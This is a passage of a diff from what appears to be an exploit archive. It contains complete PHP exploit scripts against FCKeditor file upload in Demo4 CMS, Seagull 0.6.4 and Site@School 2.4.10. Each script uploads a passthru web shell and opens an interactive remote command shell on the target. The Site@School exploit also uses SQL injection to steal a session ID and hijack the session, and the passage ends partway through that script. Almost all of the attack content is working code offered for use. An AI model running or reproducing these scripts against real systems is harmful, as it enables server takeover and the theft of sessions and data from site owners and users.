+ 47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
- 48. $sExtension = strtolower( $sExtension ) ;
+ 48. $sExtension = strtolower( $sExtension ) ;
- 49.
+ 49.
- 50. // The the file type (from the QueryString, by default 'File').
+ 50. // The the file type (from the QueryString, by default 'File').
- 51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
+ 51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
- 52.
+ 52.
- 53. // Check if it is an allowed type.
+ 53. // Check if it is an allowed type.
- 54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
+ 54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
- 55.     SendResults( 1, '', '', 'Invalid type specified' ) ;
+ 55.     SendResults( 1, '', '', 'Invalid type specified' ) ;
- 56.
+ 56.
- 57. // Get the allowed and denied extensions arrays.
+ 57. // Get the allowed and denied extensions arrays.
- 58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
+ 58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
- 59. $arDenied = $Config['DeniedExtensions'][$sType] ;
+ 59. $arDenied = $Config['DeniedExtensions'][$sType] ;
- 60.
+ 60.
- 61. // Check if it is an allowed extension.
+ 61. // Check if it is an allowed extension.
- 62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
+ 62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
- 63.  SendResults( '202' ) ;
+ 63.  SendResults( '202' ) ;
- 64.
+ 64.
- 65. $sErrorNumber = '0' ;
+ 65. $sErrorNumber = '0' ;
- 66. $sFileUrl  = '' ;
+ 66. $sFileUrl  = '' ;
- 67.
+ 67.
- 68. // Initializes the counter used to rename the file, if another one with the same name already exists.
+ 68. // Initializes the counter used to rename the file, if another one with the same name already exists.
- 69. $iCounter = 0 ;
+ 69. $iCounter = 0 ;
- 70.
+ 70.
- 71. // The the target directory.
+ 71. // The the target directory.
- 72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
+ 72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
- 73.  $sServerDir = $Config['UserFilesAbsolutePath'] ;
+ 73.  $sServerDir = $Config['UserFilesAbsolutePath'] ;
- 74. else
+ 74. else
- 75.  //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
+ 75.  //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
- 76.  $sServerDir = $Config["UserFilesPath"] ;
+ 76.  $sServerDir = $Config["UserFilesPath"] ;
- 77.
+ 77.
- 78. while ( true )
+ 78. while ( true )
- 79. {
+ 79. {
- 80.  // Compose the file path.
+ 80.  // Compose the file path.
- 81.  $sFilePath = $sServerDir . $sFileName ;
+ 81.  $sFilePath = $sServerDir . $sFileName ;
- 82.
+ 82.
- 83.  // If a file with that name already exists.
+ 83.  // If a file with that name already exists.
- 84.  if ( is_file( $sFilePath ) )
+ 84.  if ( is_file( $sFilePath ) )
- 85.  {
+ 85.  {
- 86.   $iCounter++ ;
+ 86.   $iCounter++ ;
- 87.   $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
+ 87.   $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
- 88.   $sErrorNumber = '201' ;
+ 88.   $sErrorNumber = '201' ;
- 89.  }
+ 89.  }
- 90.  else
+ 90.  else
- 91.  {
+ 91.  {
- 92.   move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
+ 92.   move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
- 93.
+ 93.
- 94.   if ( is_file( $sFilePath ) )
+ 94.   if ( is_file( $sFilePath ) )
- 95.   {
+ 95.   {
- 96.    $oldumask = umask(0) ;
+ 96.    $oldumask = umask(0) ;
- 97.    chmod( $sFilePath, 0777 ) ;
+ 97.    chmod( $sFilePath, 0777 ) ;
- 98.    umask( $oldumask ) ;
+ 98.    umask( $oldumask ) ;
- 99.   }
+ 99.   }
- 100. 
+ 100. 
- 101.   $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
+ 101.   $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
- 102.
+ 102.
- 103.   break ;
+ 103.   break ;
- 
+ 
-*/
+*/
-error_reporting(0);
+error_reporting(0);
-set_time_limit(0);
+set_time_limit(0);
-ini_set("default_socket_timeout", 5);
+ini_set("default_socket_timeout", 5);
-function http_send($host, $packet)
+function http_send($host, $packet)
-{
+{
- $sock = fsockopen($host, 80);
+ $sock = fsockopen($host, 80);
- while (!$sock)
+ while (!$sock)
- {
+ {
-  print "\n[-] No response from {$host}:80 Trying again...";
+  print "\n[-] No response from {$host}:80 Trying again...";
-  $sock = fsockopen($host, 80);
+  $sock = fsockopen($host, 80);
- }
+ }
- fputs($sock, $packet);
+ fputs($sock, $packet);
- while (!feof($sock)) $resp .= fread($sock, 1024);
+ while (!feof($sock)) $resp .= fread($sock, 1024);
- fclose($sock);
+ fclose($sock);
- return $resp;
+ return $resp;
-}
+}
-print "\n+------------------------------------------------------------+";
+print "\n+------------------------------------------------------------+";
-print "\n|Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload Exploit by Stack |";
+print "\n|Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload Exploit by Stack |";
-print "\n+------------------------------------------------------------+\n";
+print "\n+------------------------------------------------------------+\n";
-if ($argc < 2)
+if ($argc < 2)
-{
+{
- print "\nUsage......: php $argv[0] host path";
+ print "\nUsage......: php $argv[0] host path";
- print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
+ print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
- die();
+ die();
-}
+}
-$host = $argv[1];
+$host = $argv[1];
-$path = $argv[2];
+$path = $argv[2];
-$data  = "--12345\r\n";
+$data  = "--12345\r\n";
-$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
+$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
-$data .= "Content-Type: application/octet-stream\r\n\r\n";
+$data .= "Content-Type: application/octet-stream\r\n\r\n";
-$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
+$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
-$data .= "--12345--\r\n";
+$data .= "--12345--\r\n";
-$packet  = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
+$packet  = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
+$packet .= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($data)."\r\n";
+$packet .= "Content-Length: ".strlen($data)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
-$packet .= "Connection: close\r\n\r\n";
+$packet .= "Connection: close\r\n\r\n";
-$packet .= $data;
+$packet .= $data;
-preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
+preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
-if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
+if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
-else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
+else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
-define(STDIN, fopen("php://stdin", "r"));
+define(STDIN, fopen("php://stdin", "r"));
-while(1)
+while(1)
-{
+{
- print "\nstack-shell# ";
+ print "\nstack-shell# ";
- $cmd = trim(fgets(STDIN));
+ $cmd = trim(fgets(STDIN));
- if ($cmd != "exit")
+ if ($cmd != "exit")
- {
+ {
-  $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
+  $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
-  $packet.= "Host: {$host}\r\n";
+  $packet.= "Host: {$host}\r\n";
-  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-  $packet.= "Connection: close\r\n\r\n";
+  $packet.= "Connection: close\r\n\r\n";
-  $output = http_send($host, $packet);
+  $output = http_send($host, $packet);
-  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
+  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
-  $shell = explode("_code_", $output);
+  $shell = explode("_code_", $output);
-  print "\n{$shell[1]}";
+  print "\n{$shell[1]}";
- }
+ }
- else break;
+ else break;
-}
+}
-?>
+?>
-
+
-# milw0rm.com [2008-06-23]
+# milw0rm.com [2008-06-23]
--- a/platforms/php/webapps/5945.txt
+++ b/platforms/php/webapps/5945.txt
@ -1,117 +1,117 @@
-<?php
+<?php
-
+
-/*
+/*
-	------------------------------------------------------------------------
+	------------------------------------------------------------------------
-	Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit
+	Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit
-	------------------------------------------------------------------------
+	------------------------------------------------------------------------
-	
+	
-	author...: EgiX
+	author...: EgiX
-	mail.....: n0b0d13s[at]gmail[dot]com
+	mail.....: n0b0d13s[at]gmail[dot]com
-	
+	
-	link.....: http://seagullproject.org/
+	link.....: http://seagullproject.org/
-	details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
+	details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
-
+
-	[-] vulnerable code in /www/tinyfck/filemanager/connectors/php/config.php
+	[-] vulnerable code in /www/tinyfck/filemanager/connectors/php/config.php
-	
+	
-	33.	// SECURITY: You must explicitelly enable this "connector". (Set it to "true").
+	33.	// SECURITY: You must explicitelly enable this "connector". (Set it to "true").
-	34.	$Config['Enabled'] = true ;
+	34.	$Config['Enabled'] = true ;
-	35.	
+	35.	
-	36.	// Path to user files relative to the document root.
+	36.	// Path to user files relative to the document root.
-	37.	$Config['UserFilesPath'] = SGL_BASE_URL . '/images/' ;
+	37.	$Config['UserFilesPath'] = SGL_BASE_URL . '/images/' ;
-	38.	
+	38.	
-	39.	// Fill the following value it you prefer to specify the absolute path for the
+	39.	// Fill the following value it you prefer to specify the absolute path for the
-	40.	// user files directory. Usefull if you are using a virtual directory, symbolic
+	40.	// user files directory. Usefull if you are using a virtual directory, symbolic
-	41.	// link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
+	41.	// link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
-	42.	// Attention: The above 'UserFilesPath' must point to the same directory.
+	42.	// Attention: The above 'UserFilesPath' must point to the same directory.
-	43.	$Config['UserFilesAbsolutePath'] = SGL_WEB_ROOT.'/images/';
+	43.	$Config['UserFilesAbsolutePath'] = SGL_WEB_ROOT.'/images/';
-	44.	
+	44.	
-	45.	$Config['AllowedExtensions']['File']    = array() ;
+	45.	$Config['AllowedExtensions']['File']    = array() ;
-	46.	$Config['DeniedExtensions']['File']     = array('php','php3','php5','phtml','asp','aspx','ascx','jsp','cfm', [...]
+	46.	$Config['DeniedExtensions']['File']     = array('php','php3','php5','phtml','asp','aspx','ascx','jsp','cfm', [...]
-	47.	
+	47.	
-	48.	$Config['AllowedExtensions']['Image']   = array('jpg','gif','jpeg','png') ;
+	48.	$Config['AllowedExtensions']['Image']   = array('jpg','gif','jpeg','png') ;
-	49.	$Config['DeniedExtensions']['Image']    = array() ;
+	49.	$Config['DeniedExtensions']['Image']    = array() ;
-	50.	
+	50.	
-	51.	$Config['AllowedExtensions']['Flash']   = array('swf','fla') ;
+	51.	$Config['AllowedExtensions']['Flash']   = array('swf','fla') ;
-	52.	$Config['DeniedExtensions']['Flash']    = array() ;
+	52.	$Config['DeniedExtensions']['Flash']    = array() ;
-	53.	
+	53.	
-	54.	$Config['AllowedExtensions']['Media']   = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
+	54.	$Config['AllowedExtensions']['Media']   = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
-	55.	$Config['DeniedExtensions']['Media']    = array() ;
+	55.	$Config['DeniedExtensions']['Media']    = array() ;
-	
+	
-	with a default configuration of this script, an attacker might be able to upload arbitrary
+	with a default configuration of this script, an attacker might be able to upload arbitrary
-	files containing malicious PHP code due to multiple file extensions isn't properly checked
+	files containing malicious PHP code due to multiple file extensions isn't properly checked
-*/
+*/
-
+
-error_reporting(0);
+error_reporting(0);
-set_time_limit(0);
+set_time_limit(0);
-ini_set("default_socket_timeout", 5);
+ini_set("default_socket_timeout", 5);
-
+
-define(STDIN, fopen("php://stdin", "r"));
+define(STDIN, fopen("php://stdin", "r"));
-
+
-function http_send($host, $packet)
+function http_send($host, $packet)
-{
+{
-	$sock = fsockopen($host, 80);
+	$sock = fsockopen($host, 80);
-	while (!$sock)
+	while (!$sock)
-	{
+	{
-		print "\n[-] No response from {$host}:80 Trying again...";
+		print "\n[-] No response from {$host}:80 Trying again...";
-		$sock = fsockopen($host, 80);
+		$sock = fsockopen($host, 80);
-	}
+	}
-	fputs($sock, $packet);
+	fputs($sock, $packet);
-	while (!feof($sock)) $resp .= fread($sock, 1024);
+	while (!feof($sock)) $resp .= fread($sock, 1024);
-	fclose($sock);
+	fclose($sock);
-	return $resp;
+	return $resp;
-}
+}
-
+
-print "\n+--------------------------------------------------------------------+";
+print "\n+--------------------------------------------------------------------+";
-print "\n| Seagull <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
+print "\n| Seagull <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
-print "\n+--------------------------------------------------------------------+\n";
+print "\n+--------------------------------------------------------------------+\n";
-
+
-if ($argc < 3)
+if ($argc < 3)
-{
+{
-	print "\nUsage......: php $argv[0] host path\n";
+	print "\nUsage......: php $argv[0] host path\n";
-	print "\nExample....: php $argv[0] localhost /";
+	print "\nExample....: php $argv[0] localhost /";
-	print "\nExample....: php $argv[0] localhost /seagull/\n";
+	print "\nExample....: php $argv[0] localhost /seagull/\n";
-	die();
+	die();
-}
+}
-
+
-$host = $argv[1];
+$host = $argv[1];
-$path = $argv[2];
+$path = $argv[2];
-
+
-$filename  = md5(time()).".php.php4";
+$filename  = md5(time()).".php.php4";
-$connector = "tinyfck/filemanager/connectors/php/connector.php";
+$connector = "tinyfck/filemanager/connectors/php/connector.php";
-
+
-$payload  = "--o0oOo0o\r\n";
+$payload  = "--o0oOo0o\r\n";
-$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n\r\n";
+$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n\r\n";
-$payload .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
+$payload .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
-$payload .= "--o0oOo0o--\r\n";
+$payload .= "--o0oOo0o--\r\n";
-
+
-$packet  = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
+$packet  = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
+$packet .= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($payload)."\r\n";
+$packet .= "Content-Length: ".strlen($payload)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
-$packet .= "Connection: close\r\n\r\n";
+$packet .= "Connection: close\r\n\r\n";
-$packet .= $payload;
+$packet .= $payload;
-
+
-preg_match("/OnUploadCompleted\((.*),\"(.*)\"\)/i", http_send($host, $packet), $html);
+preg_match("/OnUploadCompleted\((.*),\"(.*)\"\)/i", http_send($host, $packet), $html);
-if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
+if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
-
+
-while(1)
+while(1)
-{
+{
-	print "\nseagull-shell# ";
+	print "\nseagull-shell# ";
-	$cmd = trim(fgets(STDIN));
+	$cmd = trim(fgets(STDIN));
-	if ($cmd != "exit")
+	if ($cmd != "exit")
-	{
+	{
-		$packet = "GET {$path}images/File/{$html[2]} HTTP/1.0\r\n";
+		$packet = "GET {$path}images/File/{$html[2]} HTTP/1.0\r\n";
-		$packet.= "Host: {$host}\r\n";
+		$packet.= "Host: {$host}\r\n";
-		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-		$packet.= "Connection: close\r\n\r\n";
+		$packet.= "Connection: close\r\n\r\n";
-		$output = http_send($host, $packet);
+		$output = http_send($host, $packet);
-		if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
+		if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
-		$shell  = explode("_code_", $output);
+		$shell  = explode("_code_", $output);
-		print "\n{$shell[1]}";
+		print "\n{$shell[1]}";
-	}
+	}
-	else break;
+	else break;
-}
+}
-
+
-?>
+?>
-
+
-# milw0rm.com [2008-06-26]
+# milw0rm.com [2008-06-26]
--- a/platforms/php/webapps/6005.php
+++ b/platforms/php/webapps/6005.php
@ -1,194 +1,194 @@
-<?php
+<?php
-
+
-/*
+/*
-	-------------------------------------------------------------------------
+	-------------------------------------------------------------------------
-	Site@School <= 2.4.10 (fckeditor) Session Hijacking / File Upload Exploit
+	Site@School <= 2.4.10 (fckeditor) Session Hijacking / File Upload Exploit
-	-------------------------------------------------------------------------
+	-------------------------------------------------------------------------
-	
+	
-	author...: EgiX
+	author...: EgiX
-	mail.....: n0b0d13s[at]gmail[dot]com
+	mail.....: n0b0d13s[at]gmail[dot]com
-	
+	
-	link.....: http://siteatschool.sourceforge.net/
+	link.....: http://siteatschool.sourceforge.net/
-	details..: works with magic_quotes_gpc = off (the bug isn't still patched: http://www.securityfocus.com/bid/27120)
+	details..: works with magic_quotes_gpc = off (the bug isn't still patched: http://www.securityfocus.com/bid/27120)
-	details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
+	details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
-	
+	
-	[-] vulnerable code in /starnet/editors/fckeditor/editor/filemanager/sas/browser.php
+	[-] vulnerable code in /starnet/editors/fckeditor/editor/filemanager/sas/browser.php
-	
+	
-	63.	$query = "SELECT config_value FROM $table_configuration WHERE config_key='sessioncode'";
+	63.	$query = "SELECT config_value FROM $table_configuration WHERE config_key='sessioncode'";
-	64.	if ($result = mysql_query($query))
+	64.	if ($result = mysql_query($query))
-	65.	{
+	65.	{
-	66.		$check_sessioncode = mysql_result($result, 0);
+	66.		$check_sessioncode = mysql_result($result, 0);
-	67.		unset ($query);
+	67.		unset ($query);
-	68.		unset ($result);
+	68.		unset ($result);
-	69.	}
+	69.	}
-	70.	if ($_SESSION['sessioncode'] != $check_sessioncode)
+	70.	if ($_SESSION['sessioncode'] != $check_sessioncode)
-	71.	{
+	71.	{
-	72.		//if we don't have a session present the login screen
+	72.		//if we don't have a session present the login screen
-	73.		Header("Location: ../../../../../index.php");
+	73.		Header("Location: ../../../../../index.php");
-	74.		exit;
+	74.		exit;
-	75.	}
+	75.	}
-	
+	
-	[...]
+	[...]
-	
+	
-	117.	if ($option == "upload")
+	117.	if ($option == "upload")
-	118.	{
+	118.	{
-	119.		if (IsSet ($_FILES["new_file"]["name"]))
+	119.		if (IsSet ($_FILES["new_file"]["name"]))
-	120.		{
+	120.		{
-	121.			$file_name = $_FILES["new_file"]["name"];
+	121.			$file_name = $_FILES["new_file"]["name"];
-	122.		}
+	122.		}
-	123.		if (IsSet ($_SESSION['opendir']))
+	123.		if (IsSet ($_SESSION['opendir']))
-	124.		{
+	124.		{
-	125.			$write_path = $_SESSION['user_media_path'] . "/" . $_SESSION['opendir'];
+	125.			$write_path = $_SESSION['user_media_path'] . "/" . $_SESSION['opendir'];
-	126.			// moveupload the file to $write_path, function is in core/common.inc.php
+	126.			// moveupload the file to $write_path, function is in core/common.inc.php
-	127.			$temp_file = $_FILES["new_file"]["tmp_name"]; //this is temporary uploaded file.	
+	127.			$temp_file = $_FILES["new_file"]["tmp_name"]; //this is temporary uploaded file.	
-	128.			sas_move_uploaded_file($write_path, $file_name, $temp_file);
+	128.			sas_move_uploaded_file($write_path, $file_name, $temp_file);
-	129.		}
+	129.		}
-	130.		$opendir = $_SESSION['opendir']; //for returning to the directory were we came from	
+	130.		$opendir = $_SESSION['opendir']; //for returning to the directory were we came from	
-	131.	}
+	131.	}
-	
+	
-	an attacker could be able to retrieve a valid session id using the SQL injection bug in /starnet/addons/slideshow_full.php
+	an attacker could be able to retrieve a valid session id using the SQL injection bug in /starnet/addons/slideshow_full.php
-	(http://www.milw0rm.com/exploits/4832) and bypass checks at lines 70-75 to upload malicious files containing php code!
+	(http://www.milw0rm.com/exploits/4832) and bypass checks at lines 70-75 to upload malicious files containing php code!
-*/
+*/
-
+
-error_reporting(0);
+error_reporting(0);
-ini_set("default_socket_timeout",5);
+ini_set("default_socket_timeout",5);
-set_time_limit(0);
+set_time_limit(0);
-
+
-define(STDIN, fopen("php://stdin", "r"));
+define(STDIN, fopen("php://stdin", "r"));
-
+
-function http_send($host, $packet)
+function http_send($host, $packet)
-{
+{
-	$sock = fsockopen($host, 80);
+	$sock = fsockopen($host, 80);
-	while (!$sock)
+	while (!$sock)
-	{
+	{
-		print "\n[-] No response from {$host}:80 Trying again...\n";
+		print "\n[-] No response from {$host}:80 Trying again...\n";
-		$sock = fsockopen($host, 80);
+		$sock = fsockopen($host, 80);
-	}
+	}
-	fputs($sock, $packet);
+	fputs($sock, $packet);
-	while (!feof($sock)) $resp .= fread($sock, 1024);
+	while (!feof($sock)) $resp .= fread($sock, 1024);
-	fclose($sock);
+	fclose($sock);
-	return $resp;
+	return $resp;
-}
+}
-
+
-function upload()
+function upload()
-{
+{
-	global $host, $path, $sid;
+	global $host, $path, $sid;
-	
+	
-	$file_ext = array(".fla", ".swf", ".rar", ".zip", ".xls", ".csv");
+	$file_ext = array(".fla", ".swf", ".rar", ".zip", ".xls", ".csv");
-	
+	
-	$packet  = "GET {$path}starnet/editors/fckeditor/editor/filemanager/sas/images.php?opendir=gallery HTTP/1.0\r\n";
+	$packet  = "GET {$path}starnet/editors/fckeditor/editor/filemanager/sas/images.php?opendir=gallery HTTP/1.0\r\n";
-	$packet .= "Host: {$host}\r\n";
+	$packet .= "Host: {$host}\r\n";
-	$packet .= "Cookie: PHPSESSID={$sid}\r\n";
+	$packet .= "Cookie: PHPSESSID={$sid}\r\n";
-	$packet .= "Connection: close\r\n\r\n";
+	$packet .= "Connection: close\r\n\r\n";
-	
+	
-	http_send($host, $packet);
+	http_send($host, $packet);
-	
+	
-	foreach ($file_ext as $ext)
+	foreach ($file_ext as $ext)
-	{
+	{
-		print "\n[-] Trying to upload with {$ext} extension...";
+		print "\n[-] Trying to upload with {$ext} extension...";
-		
+		
-		$payload  = "--o0oOo0o\r\n";
+		$payload  = "--o0oOo0o\r\n";
-		$payload .= "Content-Disposition: form-data; name=\"new_file\"; filename=\"test.php{$ext}\"\r\n\r\n";
+		$payload .= "Content-Disposition: form-data; name=\"new_file\"; filename=\"test.php{$ext}\"\r\n\r\n";
-		$payload .= "<?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";
+		$payload .= "<?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";
-		$payload .= "--o0oOo0o--\r\n";
+		$payload .= "--o0oOo0o--\r\n";
-
+
-		$packet  = "POST {$path}starnet/editors/fckeditor/editor/filemanager/sas/browser.php?option=upload HTTP/1.0\r\n";
+		$packet  = "POST {$path}starnet/editors/fckeditor/editor/filemanager/sas/browser.php?option=upload HTTP/1.0\r\n";
-		$packet .= "Host: {$host}\r\n";
+		$packet .= "Host: {$host}\r\n";
-		$packet .= "Cookie: PHPSESSID={$sid}\r\n";
+		$packet .= "Cookie: PHPSESSID={$sid}\r\n";
-		$packet .= "Content-Length: ".strlen($payload)."\r\n";
+		$packet .= "Content-Length: ".strlen($payload)."\r\n";
-		$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
+		$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
-		$packet .= "Connection: close\r\n\r\n";
+		$packet .= "Connection: close\r\n\r\n";
-		$packet .= $payload;
+		$packet .= $payload;
-
+
-		if (preg_match("/File upload error/i", http_send($host, $packet))) die("\n[-] Upload failed!\n");
+		if (preg_match("/File upload error/i", http_send($host, $packet))) die("\n[-] Upload failed!\n");
-		
+		
-		$packet  = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n";
+		$packet  = "GET {$path}starnet/media/gallery/test.php{$ext} HTTP/1.0\r\n";
-		$packet .= "Host: {$host}\r\n";
+		$packet .= "Host: {$host}\r\n";
-		$packet .= "Connection: close\r\n\r\n";
+		$packet .= "Connection: close\r\n\r\n";
-		$html    = http_send($host, $packet);
+		$html    = http_send($host, $packet);
-		
+		
-		if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
+		if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
-		
+		
-		sleep(1);
+		sleep(1);
-	}
+	}
-	
+	
-	return false;
+	return false;
-}
+}
-
+
-function get_sid()
+function get_sid()
-{
+{
-	global $host, $path, $prefix;
+	global $host, $path, $prefix;
-	
+	
-	// thanks to rgod for giving to understand that this isn't blind injetion...r.i.p. my friend!
+	// thanks to rgod for giving to understand that this isn't blind injetion...r.i.p. my friend!
-	$sql =  "'/**/UNION/**/SELECT/**/CONCAT(CHAR(0xFF),ses_id,CHAR(0xFF),CHAR(0x27)),1,1/**/" .
+	$sql =  "'/**/UNION/**/SELECT/**/CONCAT(CHAR(0xFF),ses_id,CHAR(0xFF),CHAR(0x27)),1,1/**/" .
-		"FROM/**/{$prefix}_sessions/**/WHERE/**/ses_value/**/LIKE/**/'%sessioncode%'%23";
+		"FROM/**/{$prefix}_sessions/**/WHERE/**/ses_value/**/LIKE/**/'%sessioncode%'%23";
-
+
-	$packet  = "GET {$path}starnet/addons/slideshow_full.php?album_name={$sql} HTTP/1.0\r\n";
+	$packet  = "GET {$path}starnet/addons/slideshow_full.php?album_name={$sql} HTTP/1.0\r\n";
-	$packet .= "Host: {$host}\r\n";
+	$packet .= "Host: {$host}\r\n";
-	$packet .= "Connection: close\r\n\r\n";
+	$packet .= "Connection: close\r\n\r\n";
-
+
-	$pieces = explode(chr(0xFF), http_send($host, $packet));
+	$pieces = explode(chr(0xFF), http_send($host, $packet));
-	return $pieces[1];
+	return $pieces[1];
-}
+}
-
+
-function check_target()
+function check_target()
-{
+{
-	global $host, $path, $prefix;
+	global $host, $path, $prefix;
-	
+	
-	print "\n[-] Checking {$host}...";
+	print "\n[-] Checking {$host}...";
-	
+	
-	$packet  = "GET {$path}starnet/addons/slideshow_full.php?album_name=%27 HTTP/1.0\r\n";
+	$packet  = "GET {$path}starnet/addons/slideshow_full.php?album_name=%27 HTTP/1.0\r\n";
-	$packet .= "Host: {$host}\r\n";
+	$packet .= "Host: {$host}\r\n";
-	$packet .= "Connection: close\r\n\r\n";
+	$packet .= "Connection: close\r\n\r\n";
-	
+	
-	if (preg_match("/FROM (.*)_m/", http_send($host, $packet), $match)) print "vulnerable!\n";
+	if (preg_match("/FROM (.*)_m/", http_send($host, $packet), $match)) print "vulnerable!\n";
-	else die("not vulnerable!\n\n[-] Exploit failed...probably magic_quotes_gpc = on\n");
+	else die("not vulnerable!\n\n[-] Exploit failed...probably magic_quotes_gpc = on\n");
-	
+	
-	$prefix = $match[1];
+	$prefix = $match[1];
-}
+}
-
+
-print "\n+-----------------------------------------------------------------------+";
+print "\n+-----------------------------------------------------------------------+";
-print "\n| Site@School <= 2.4.10 Session Hijacking / File Upload Exploit by EgiX |";
+print "\n| Site@School <= 2.4.10 Session Hijacking / File Upload Exploit by EgiX |";
-print "\n+-----------------------------------------------------------------------+\n";
+print "\n+-----------------------------------------------------------------------+\n";
-
+
-if ($argc < 3)
+if ($argc < 3)
-{
+{
-	print "\nUsage...: php $argv[0] host path \n";
+	print "\nUsage...: php $argv[0] host path \n";
-	print "\nhost....: target server (ip/hostname)";
+	print "\nhost....: target server (ip/hostname)";
-	print "\npath....: path to sas directory\n";
+	print "\npath....: path to sas directory\n";
-	die();
+	die();
-}
+}
-
+
-$host = $argv[1];
+$host = $argv[1];
-$path = $argv[2];
+$path = $argv[2];
-
+
-check_target();
+check_target();
-$sid = get_sid();
+$sid = get_sid();
-
+
-if (empty($sid)) die("\n[-] Session id not found! Try later...\n");
+if (empty($sid)) die("\n[-] Session id not found! Try later...\n");
-else print "\n[-] Hijacking with sid {$sid}\n";
+else print "\n[-] Hijacking with sid {$sid}\n";
-
+
